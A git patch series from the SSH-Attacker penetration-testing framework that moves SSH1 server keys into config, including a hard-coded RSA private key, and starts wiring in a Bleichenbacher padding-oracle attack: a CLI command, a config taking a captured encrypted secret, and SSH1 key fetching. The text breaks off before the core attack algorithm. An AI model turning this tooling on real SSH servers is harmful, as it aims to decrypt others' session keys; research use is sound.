b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -296,6 +296,11 @@ public void setDefaultAdditionalPadding(Integer defaultAdditionalPadding) { @XmlElementWrapper private List> hostKeys; + /** Server key */ + @XmlElement(name = "hostKey") + @XmlElementWrapper + private List> serverKeys; + /** * RSA transient key used to encrypt the shared secret K. This may be a transient key generated * solely for this SSH connection, or it may be re-used for several connections. @@ -818,6 +823,47 @@ public Config() { "092E829DE536BE8F7D74E7A3C6CD90EA6EADDDEEB2E50D8617EBDD132B53669B"), NamedEcGroup.CURVE25519))); + serverKeys = + List.of( + new SshPublicKey<>( + PublicKeyFormat.SSH_RSA, + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)), + new CustomRsaPrivateKey( + new BigInteger( + "64F3D28624C63EC5E0A9751FDC4B2D" + + "ADC715F0DDA9D49EF91B4C5AA03483" + + "570BA8AA01151B704335A3219E7D22" + + "2FDB9777DA68F8DF8B5CDB5DB9B0C3" + + "99CF0334044E6ED09B40E754809429" + + "F6C387B7AC7BA00ECFE7AFE4D41499" + + "B2F341FBB0496C52CBE5EB1F7E64F4" + + "BF21F72B64EE0B478EAB6A0008E07A" + + "E2F52960703D0EB9", + 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)))); + fallbackRsaTransientPublicKey = new SshPublicKey<>( PublicKeyFormat.SSH_RSA, @@ -1355,6 +1401,10 @@ public Boolean getEnforceSettings() { return hostKeys; } + public List> getServerKeys() { + return serverKeys; + } + // endregion // region Setters for KeyExchange public void setDhGexMinimalGroupSize(Integer dhGexMinimalGroupSize) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 40c2d4f40..d1868f057 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -977,8 +977,8 @@ public void setSshv1SessionID(byte[] sshv1SessionID) { this.sshv1SessionID = sshv1SessionID; } - public byte[] getAntiSpoofingCookie() { - return antiSpoofingCookie; + public Optional getAntiSpoofingCookie() { + return Optional.ofNullable(antiSpoofingCookie); } public void setAntiSpoofingCookie(byte[] antiSpoofingCookie) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index 6935a7902..cfad93f28 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -31,9 +31,7 @@ public ClientSessionKeyMessagePreparator(Chooser chooser, ClientSessionKeyMessag } private void prepareAntiSpoofingCookie() { - getObject() - .setAntiSpoofingCookie( - chooser.getContext().getSshContext().getAntiSpoofingCookie()); + getObject().setAntiSpoofingCookie(chooser.getAntiSpoofingCookie()); } private void prepareSessionID() { @@ -41,62 +39,6 @@ private void prepareSessionID() { } private void prepareEncryptionAlgorithm() { - // Choose Encryption Type - // CipherMethod chosenCipherMethod; - /*if (!chooser.getContext().getSshContext().getSupportedCipherMethods().isEmpty()) { - chosenCipherMethod = - chooser.getContext().getSshContext().getSupportedCipherMethods().get(0); - */ - /*if (chooser.getContext().getSshContext().getSupportedCipherMethods().size() > 1) { - chosenCipherMethod = - chooser.getContext().getSshContext().getSupportedCipherMethods().get(1); - }*/ - /* - chooser.getContext().getSshContext().setChosenCipherMethod(chosenCipherMethod); - - // Derive correct Encryption Algorithm - EncryptionAlgorithm encryptionAlgorithm; - switch (chosenCipherMethod) { - case SSH_CIPHER_3DES: - encryptionAlgorithm = EncryptionAlgorithm.TRIPLE_DES_CBC; - break; - case SSH_CIPHER_NONE: - encryptionAlgorithm = EncryptionAlgorithm.NONE; - break; - case SSH_CIPHER_IDEA: - encryptionAlgorithm = - EncryptionAlgorithm.IDEA_CTR; // Wrong, needts to be IDEA_CFB! - break; - case SSH_CIPHER_DES: - encryptionAlgorithm = EncryptionAlgorithm.DES_CBC; - break; - case SSH_CIPHER_ARCFOUR: - encryptionAlgorithm = EncryptionAlgorithm.ARCFOUR; - break; - case SSH_CIPHER_BLOWFISH: - encryptionAlgorithm = EncryptionAlgorithm.BLOWFISH_CBC; - break; - default: - encryptionAlgorithm = EncryptionAlgorithm.NONE; - // Fallback to None if nothing applied, throw Warning. - LOGGER.warn( - "chosen unsupported Encryption-Algorithm {}, fall back to NONE", - chosenCipherMethod); - } - LOGGER.info("Successfulle applied Encryption Algorihm {}", encryptionAlgorithm); - - // Set Server2Client and Client2Server identical because of SSH1 - chooser.getContext() - .getSshContext() - .setEncryptionAlgorithmClientToServer(encryptionAlgorithm); - - chooser.getContext() - .getSshContext() - .setEncryptionAlgorithmServerToClient(encryptionAlgorithm); - - getObject().setChosenCipherMethod(chooser.getContext().getSshContext().getChosenCipherMethod()); - }*/ - getObject() .setChosenCipherMethod( chooser.getContext().getSshContext().getChosenCipherMethod()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index 3736259d8..304684f06 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -11,16 +11,11 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.keys.*; -import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import java.security.KeyPair; -import java.security.KeyPairGenerator; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; -import java.security.interfaces.RSAPrivateKey; -import java.security.interfaces.RSAPublicKey; import java.util.Arrays; import java.util.List; import org.apache.logging.log4j.LogManager; @@ -51,24 +46,7 @@ public void prepareMessageSpecificContents() { prepareSessionID(); } - public void generateServerKey() throws CryptoException { - int transientKeyLength = 786; // Bit, default Value referring to RFC - try { - KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA"); - keyGen.initialize(transientKeyLength); - KeyPair key = keyGen.generateKeyPair(); - CustomRsaPublicKey publicKey = new CustomRsaPublicKey((RSAPublicKey) key.getPublic()); - CustomRsaPrivateKey privateKey = - new CustomRsaPrivateKey((RSAPrivateKey) key.getPrivate()); - this.serverKey = new SshPublicKey<>(PublicKeyFormat.SSH_RSA, publicKey, privateKey); - } catch (NoSuchAlgorithmException e) { - throw new CryptoException( - "Unable to generate RSA transient key - RSA key pair generator is not available"); - } - } - public void prepareHostKey() { - int hostKeylenght; SshPublicKey opt_hostKey = chooser.getConfig().getHostKeys().get(0); CustomRsaPublicKey publicKey = (CustomRsaPublicKey) opt_hostKey.getPublicKey(); @@ -88,12 +66,6 @@ public void prepareHostKey() { getObject().setHostKey(hostKey); chooser.getContext().getSshContext().setHostKey(hostKey); - /* hostKeylenght = publicKey.getPublicExponent().bitLength(); - hostKeylenght = hostKeylenght + publicKey.getModulus().bitLength(); - getObject().setHostPublicModulus(publicKey.getModulus().toByteArray()); - getObject().setHostPublicExponent(publicKey.getPublicExponent().toByteArray()); - getObject().setHostKeyByteLenght(hostKeylenght / 8);*/ - getObject().setHostKeyBitLenght(publicKey.getModulus().bitLength()); LOGGER.debug( @@ -106,25 +78,19 @@ public void prepareHostKey() { public void prepareServerKey() { - int serverKeyLenght; - try { - generateServerKey(); - } catch (CryptoException e) { - throw new RuntimeException(e); + List> serverKeys = chooser.getConfig().getServerKeys(); + if (!serverKeys.isEmpty()) { + SshPublicKey key = serverKeys.get(0); + if (key.getPrivateKey().isPresent()) { + CustomRsaPrivateKey privkey = (CustomRsaPrivateKey) key.getPrivateKey().get(); + CustomRsaPublicKey pubkey = (CustomRsaPublicKey) key.getPublicKey(); + this.serverKey = new SshPublicKey<>(PublicKeyFormat.SSH_RSA, pubkey, privkey); + } } + chooser.getContext().getSshContext().setServerKey(serverKey); getObject().setServerKey(serverKey); - - /* serverKeyLenght = serverKey.getPublicKey().getPublicExponent().bitLength(); - serverKeyLenght = serverKeyLenght + serverKey.getPublicKey().getModulus().bitLength(); - getObject().setServerKeyByteLenght(serverKeyLenght / 8);*/ - getObject().setServerKeyBitLenght(serverKey.getPublicKey().getModulus().bitLength()); - /* - getObject().setServerPublicModulus(serverKey.getPublicKey().getModulus().toByteArray()); - getObject() - .setServerPublicExponent( - serverKey.getPublicKey().getPublicExponent().toByteArray());*/ LOGGER.debug( "[bro] ServerKey Exponent: {}", @@ -220,23 +186,21 @@ private void prepareSessionID() { throw new RuntimeException(); } - cookie = chooser.getConfig().getAntiSpoofingCookie(); + cookie = chooser.getAntiSpoofingCookie(); - // DEBUG CODE + // Remove sign-byte if present if (hostModulus[0] == 0) { hostModulus = Arrays.copyOfRange(hostModulus, 1, hostModulus.length); } - // DEBUG CODE - - // DEBUG CODE if (serverModulus[0] == 0) { serverModulus = Arrays.copyOfRange(serverModulus, 1, serverModulus.length); } - // DEBUG CODE - LOGGER.debug("Servermodulus for SessionID: {}", serverModulus); - LOGGER.debug("Hostmodulus for SessionID: {}", hostModulus); - LOGGER.debug("Cookie for SessionID: {}", cookie); + /* + LOGGER.debug("Servermodulus for SessionID: {}", serverModulus); + LOGGER.debug("Hostmodulus for SessionID: {}", hostModulus); + LOGGER.debug("Cookie for SessionID: {}", cookie); + */ MessageDigest md = null; try { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java index b7d63d38f..753305774 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java @@ -64,6 +64,8 @@ public Context getContext() { public abstract byte[] getServerCookie(); + public abstract byte[] getAntiSpoofingCookie(); + public abstract List getClientSupportedKeyExchangeAlgorithms(); public abstract List getServerSupportedKeyExchangeAlgorithms(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java index 2595efb54..ff7c4fdc7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java @@ -146,6 +146,20 @@ public byte[] getClientCookie() { return context.getSshContext().getClientCookie().orElse(config.getClientCookie()); } + /** + * Retrieves the SSHv1-Anti-Spoofing cookie from context. If no cookie was received (i. e. + * out-of-order workflow or SSH-Attacker is running in client mode), the SSHv1-Anti-Spoofing + * cookie from config will be returned instead. + * + * @return The key exchange cookie of the client + */ + @Override + public byte[] getAntiSpoofingCookie() { + return context.getSshContext() + .getAntiSpoofingCookie() + .orElse(config.getAntiSpoofingCookie()); + } + /** * Retrieves the server cookie from context. If no cookie was received (i. e. out-of-order * workflow or SSH-Attacker is running in server mode), the server cookie from config will be From 22af1fac825cccfa7865a1088c7cd1491217bf39 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Tue, 26 Sep 2023 01:27:14 +0200 Subject: [PATCH 086/176] Implementing Basic Bleichenbacher with mock-Oracle --- .../de/rub/nds/sshattacker/attacks/Main.java | 8 + .../config/BleichenbacherCommandConfig.java | 104 +++ .../attacks/general/KeyFetcher.java | 163 ++++- .../attacks/impl/BleichenbacherAttacker.java | 600 ++++++++++++++++++ .../attacks/pkcs1/Bleichenbacher.java | 586 +++++++++++++++++ .../attacks/pkcs1/Pkcs1Attack.java | 16 + .../attacks/pkcs1/oracles/Pkcs1Oracle.java | 4 + .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 145 +++++ .../core/config/delegate/ServerDelegate.java | 17 + .../ClientSessionKeyMessageHandler.java | 2 + .../message/VersionExchangeMessageSSHV1.java | 8 +- .../factory/WorkflowConfigurationFactory.java | 61 ++ .../workflow/factory/WorkflowTraceType.java | 1 + 13 files changed, 1698 insertions(+), 17 deletions(-) create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/Ssh1MockOracle.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/Main.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/Main.java index bd03d92d1..28ac2a2c9 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/Main.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/Main.java @@ -12,9 +12,11 @@ import com.beust.jcommander.JCommander; import com.beust.jcommander.JCommander.Builder; import com.beust.jcommander.ParameterException; +import de.rub.nds.sshattacker.attacks.config.BleichenbacherCommandConfig; import de.rub.nds.sshattacker.attacks.config.MangerCommandConfig; import de.rub.nds.sshattacker.attacks.config.delegate.GeneralAttackDelegate; import de.rub.nds.sshattacker.attacks.impl.Attacker; +import de.rub.nds.sshattacker.attacks.impl.BleichenbacherAttacker; import de.rub.nds.sshattacker.attacks.impl.MangerAttacker; import de.rub.nds.sshattacker.core.config.SshDelegateConfig; import de.rub.nds.sshattacker.core.config.delegate.GeneralDelegate; @@ -34,6 +36,9 @@ public static void main(String[] args) { MangerCommandConfig mangerTest = new MangerCommandConfig(generalDelegate); builder.addCommand(MangerCommandConfig.ATTACK_COMMAND, mangerTest); + BleichenbacherCommandConfig bbTest = new BleichenbacherCommandConfig(generalDelegate); + builder.addCommand(BleichenbacherCommandConfig.ATTACK_COMMAND, bbTest); + JCommander jc = builder.build(); try { @@ -65,6 +70,9 @@ public static void main(String[] args) { case MangerCommandConfig.ATTACK_COMMAND: attacker = new MangerAttacker(mangerTest, mangerTest.createConfig()); break; + case BleichenbacherCommandConfig.ATTACK_COMMAND: + attacker = new BleichenbacherAttacker(bbTest, bbTest.createConfig()); + break; default: break; } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java new file mode 100644 index 000000000..a82e7dcff --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -0,0 +1,104 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.config; + +import com.beust.jcommander.Parameter; +import com.beust.jcommander.ParametersDelegate; +import de.rub.nds.sshattacker.attacks.config.delegate.AttackDelegate; +import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.config.delegate.ClientDelegate; +import de.rub.nds.sshattacker.core.config.delegate.GeneralDelegate; +import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; +import de.rub.nds.sshattacker.core.constants.ProtocolVersion; +import de.rub.nds.sshattacker.core.layer.constant.LayerConfiguration; +import de.rub.nds.sshattacker.core.util.Converter; +import java.util.List; + +/** Config for Manger's attack */ +public class BleichenbacherCommandConfig extends AttackConfig { + + /** Command line parameter to call the attack */ + public static final String ATTACK_COMMAND = "bb"; + + @ParametersDelegate private final ClientDelegate clientDelegate; + + @ParametersDelegate private final AttackDelegate attackDelegate; + + @Parameter( + names = "-kex_algorithm", + required = true, + description = + "The key exchange algorithm that should be used: rsa2048-pkcs1 or rsa1024-pkcs1") + private String kexAlgorithm; + + @Parameter( + names = "-encrypted_secret", + required = true, + description = + "Encrypted secret from the CMSG_SSH_SESSION_KEY " + + " message. You can retrieve this message from the Wireshark traffic. Find the" + + " secret message, right click on the \"Encrypted Secret\" value and copy this value as a Hex Stream.") + private String encryptedSecret; + + /** How many rescans should be done */ + private int numberOfIterations = 3; + + public BleichenbacherCommandConfig(GeneralDelegate delegate) { + super(delegate); + clientDelegate = new ClientDelegate(); + attackDelegate = new AttackDelegate(); + addDelegate(clientDelegate); + addDelegate(attackDelegate); + } + + @Override + public Config createConfig() { + Config config = super.createConfig(); + config.setStopActionsAfterIOException(true); + config.setWorkflowExecutorShouldClose(false); + config.setProtocolVersion(ProtocolVersion.SSH1); + config.setDefaultLayerConfiguration(LayerConfiguration.SSHV1); + + return config; + } + + @Override + public boolean isExecuteAttack() { + return attackDelegate.isExecuteAttack(); + } + + public String getEncryptedSecret() { + return encryptedSecret; + } + + public void setEncryptedSecret(String encryptedSecret) { + this.encryptedSecret = encryptedSecret; + } + + public String getKexAlgorithm() { + return kexAlgorithm; + } + + public KeyExchangeAlgorithm getKeyExchangeAlgorithm() { + List list = + Converter.nameListToEnumValues(kexAlgorithm, KeyExchangeAlgorithm.class); + return list.get(0); + } + + public void setKexAlgorithm(String kexAlgorithm) { + this.kexAlgorithm = kexAlgorithm; + } + + public int getNumberOfIterations() { + return numberOfIterations; + } + + public void setNumberOfIterations(int mapListDepth) { + this.numberOfIterations = mapListDepth; + } +} diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java index 40c8a2339..a68b85511 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java @@ -8,8 +8,10 @@ package de.rub.nds.sshattacker.attacks.general; import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.constants.ProtocolVersion; import de.rub.nds.sshattacker.core.constants.RunningModeType; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangePubkeyMessage; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; @@ -20,6 +22,7 @@ import de.rub.nds.sshattacker.core.workflow.factory.WorkflowTraceType; import java.io.IOException; import java.security.interfaces.RSAPublicKey; +import java.util.ArrayList; import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -31,28 +34,154 @@ public class KeyFetcher { /** Fetches the transient public key from an RSA key-exchange */ public static RSAPublicKey fetchRsaTransientKey(Config config) { - return fetchRsaTransientKey(config, 0, 5); + if (config.getProtocolVersion() == ProtocolVersion.SSH2) { + return fetchRsaTransientKey(config, 0, 5, ProtocolVersion.SSH2); + } else if (config.getProtocolVersion() == ProtocolVersion.SSH1) { + return fetchRsaTransientKey(config, 0, 5, ProtocolVersion.SSH1); + } else { + return null; + } } public static RSAPublicKey fetchRsaTransientKey(Config config, int maxAttempts) { - return fetchRsaTransientKey(config, 0, maxAttempts); + return fetchRsaTransientKey(config, 0, maxAttempts, ProtocolVersion.SSH2); } - private static RSAPublicKey fetchRsaTransientKey(Config config, int attempt, int maxAttempts) { + private static RSAPublicKey fetchRsaTransientKey( + Config config, int attempt, int maxAttempts, ProtocolVersion version) { WorkflowConfigurationFactory factory = new WorkflowConfigurationFactory(config); + + if (version == ProtocolVersion.SSH2) { + WorkflowTrace trace = + factory.createWorkflowTrace( + WorkflowTraceType.KEX_INIT_ONLY, RunningModeType.CLIENT); + + ReceiveAction receiveAction = new ReceiveAction(new RsaKeyExchangePubkeyMessage()); + trace.addSshAction(receiveAction); + + State state = new State(config, trace); + WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); + try { + workflowExecutor.executeWorkflow(); + + if (!state.getSshContext().getTransportHandler().isClosed()) { + state.getSshContext().getTransportHandler().closeConnection(); + } + } catch (IOException e) { + if (attempt < maxAttempts) { + LOGGER.debug( + String.format( + "Encountered IOException on socket in attempt %d, retrying...", + attempt)); + return fetchRsaTransientKey(config, attempt + 1, maxAttempts, version); + } else { + LOGGER.warn("Could not fetch server's RSA host key, encountered IOException"); + LOGGER.debug(e); + return null; + } + } + + List> receivedMessages = receiveAction.getReceivedMessages(); + + if (receivedMessages.size() > 0 + && receivedMessages.get(0) instanceof RsaKeyExchangePubkeyMessage) { + return ((RsaKeyExchangePubkeyMessage) receivedMessages.get(0)) + .getTransientPublicKey() + .getPublicKey(); + } else { + if (attempt < maxAttempts) { + LOGGER.debug( + String.format( + "Did not receive PubkeyMessage in attempt %d, retrying...", + attempt)); + return fetchRsaTransientKey(config, attempt + 1, maxAttempts, version); + } else { + LOGGER.warn( + "Could not fetch server's RSA host key, did not receive PubkeyMessage."); + return null; + } + } + } else { + WorkflowTrace trace = + factory.createWorkflowTrace( + WorkflowTraceType.KEX_SSH1_ONLY, RunningModeType.CLIENT); + + ReceiveAction receiveAction = new ReceiveAction(new ServerPublicKeyMessage()); + trace.addSshAction(receiveAction); + + State state = new State(config, trace); + WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); + + workflowExecutor.executeWorkflow(); + + /* try { + workflowExecutor.executeWorkflow(); + + if (!state.getSshContext().getTransportHandler().isClosed()) { + LOGGER.debug("Running into"); + state.getSshContext().getTransportHandler().closeConnection(); + } + } catch (IOException e) { + if (attempt < maxAttempts) { + LOGGER.debug( + String.format( + "Encountered IOException on socket in attempt %d, retrying...", + attempt)); + return fetchRsaTransientKey(config, attempt + 1, maxAttempts, version); + } else { + LOGGER.warn("Could not fetch server's RSA host key, encountered IOException"); + LOGGER.debug(e); + return null; + } + }*/ + + List> receivedMessages = receiveAction.getReceivedMessages(); + + if (receivedMessages.size() > 0 + && receivedMessages.get(0) instanceof ServerPublicKeyMessage) { + return ((ServerPublicKeyMessage) receivedMessages.get(0)) + .getServerKey() + .getPublicKey(); + } else { + if (attempt < maxAttempts) { + LOGGER.debug( + String.format( + "Did not receive PubkeyMessage in attempt %d, retrying...", + attempt)); + return fetchRsaTransientKey(config, attempt + 1, maxAttempts, version); + } else { + LOGGER.warn( + "Could not fetch server's RSA host key, did not receive PubkeyMessage."); + return null; + } + } + } + } + + public static List fetchRsaSsh1Keys(Config config) { + return fetchRsaSsh1Keys(config, 0, 5); + } + + public static List fetchRsaSsh1Keys(Config config, int attempt, int maxAttempts) { + WorkflowConfigurationFactory factory = new WorkflowConfigurationFactory(config); + WorkflowTrace trace = factory.createWorkflowTrace( - WorkflowTraceType.KEX_INIT_ONLY, RunningModeType.CLIENT); + WorkflowTraceType.KEX_SSH1_ONLY, RunningModeType.CLIENT); - ReceiveAction receiveAction = new ReceiveAction(new RsaKeyExchangePubkeyMessage()); + ReceiveAction receiveAction = new ReceiveAction(new ServerPublicKeyMessage()); trace.addSshAction(receiveAction); State state = new State(config, trace); WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); - try { + + workflowExecutor.executeWorkflow(); + + /* try { workflowExecutor.executeWorkflow(); if (!state.getSshContext().getTransportHandler().isClosed()) { + LOGGER.debug("Running into"); state.getSshContext().getTransportHandler().closeConnection(); } } catch (IOException e) { @@ -61,28 +190,36 @@ private static RSAPublicKey fetchRsaTransientKey(Config config, int attempt, int String.format( "Encountered IOException on socket in attempt %d, retrying...", attempt)); - return fetchRsaTransientKey(config, attempt + 1, maxAttempts); + return fetchRsaTransientKey(config, attempt + 1, maxAttempts, version); } else { LOGGER.warn("Could not fetch server's RSA host key, encountered IOException"); LOGGER.debug(e); return null; } - } + }*/ List> receivedMessages = receiveAction.getReceivedMessages(); if (receivedMessages.size() > 0 - && receivedMessages.get(0) instanceof RsaKeyExchangePubkeyMessage) { - return ((RsaKeyExchangePubkeyMessage) receivedMessages.get(0)) - .getTransientPublicKey() - .getPublicKey(); + && receivedMessages.get(0) instanceof ServerPublicKeyMessage) { + + List rsaPublicKeys = new ArrayList<>(); + + rsaPublicKeys.add( + ((ServerPublicKeyMessage) receivedMessages.get(0)) + .getServerKey() + .getPublicKey()); + rsaPublicKeys.add( + ((ServerPublicKeyMessage) receivedMessages.get(0)).getHostKey().getPublicKey()); + + return rsaPublicKeys; } else { if (attempt < maxAttempts) { LOGGER.debug( String.format( "Did not receive PubkeyMessage in attempt %d, retrying...", attempt)); - return fetchRsaTransientKey(config, attempt + 1, maxAttempts); + return fetchRsaSsh1Keys(config, attempt + 1, maxAttempts); } else { LOGGER.warn( "Could not fetch server's RSA host key, did not receive PubkeyMessage."); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java new file mode 100644 index 000000000..ac98229ff --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -0,0 +1,600 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.impl; + +import static de.rub.nds.tlsattacker.util.ConsoleLogger.CONSOLE; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.attacks.config.BleichenbacherCommandConfig; +import de.rub.nds.sshattacker.attacks.exception.OracleUnstableException; +import de.rub.nds.sshattacker.attacks.general.KeyFetcher; +import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; +import de.rub.nds.sshattacker.attacks.general.Vector; +import de.rub.nds.sshattacker.attacks.padding.VectorResponse; +import de.rub.nds.sshattacker.attacks.padding.vector.FingerprintTaskVectorPair; +import de.rub.nds.sshattacker.attacks.pkcs1.*; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Ssh1MockOracle; +import de.rub.nds.sshattacker.attacks.response.EqualityError; +import de.rub.nds.sshattacker.attacks.response.EqualityErrorTranslator; +import de.rub.nds.sshattacker.attacks.response.FingerPrintChecker; +import de.rub.nds.sshattacker.attacks.response.ResponseFingerprint; +import de.rub.nds.sshattacker.attacks.task.FingerPrintTask; +import de.rub.nds.sshattacker.attacks.task.SshTask; +import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; +import de.rub.nds.sshattacker.core.state.State; +import java.math.BigInteger; +import java.security.InvalidKeyException; +import java.security.NoSuchAlgorithmException; +import java.security.interfaces.RSAPublicKey; +import java.util.ArrayList; +import java.util.Collections; +import java.util.LinkedList; +import java.util.List; +import javax.crypto.NoSuchPaddingException; +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * Sends differently formatted PKCS#1 v2.x messages to the SSH server and observes the server + * responses. In case there are differences in the server responses, it is very likely that it is + * possible to execute Manger's attack. + */ +public class BleichenbacherAttacker extends Attacker { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final Config sshConfig; + + private boolean increasingTimeout = true; + + private long additionalTimeout = 1000; + + private long additionalTcpTimeout = 5000; + + private List fullResponseMap; + + private EqualityError resultError; + + private final ParallelExecutor executor; + + private boolean erroneousScans = false; + + private KeyExchangeAlgorithm keyExchangeAlgorithm; + + private List publicKeys = new ArrayList<>(); + private RSAPublicKey serverPublicKey, hostPublicKey; + + /** + * @param bleichenbacherConfig Manger attack config + * @param baseConfig Base config + */ + public BleichenbacherAttacker( + BleichenbacherCommandConfig bleichenbacherConfig, Config baseConfig) { + this(bleichenbacherConfig, baseConfig, new ParallelExecutor(1, 3)); + } + + /** + * @param bleichenbacherCommandConfig Manger attack config + * @param baseConfig Base config + * @param executor Executor + */ + public BleichenbacherAttacker( + BleichenbacherCommandConfig 